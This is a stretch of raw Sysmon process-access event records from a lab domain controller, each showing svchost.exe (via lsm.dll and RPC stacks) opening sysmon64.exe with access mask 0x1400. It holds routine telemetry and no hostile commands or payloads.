13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.710{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.708{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.707{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 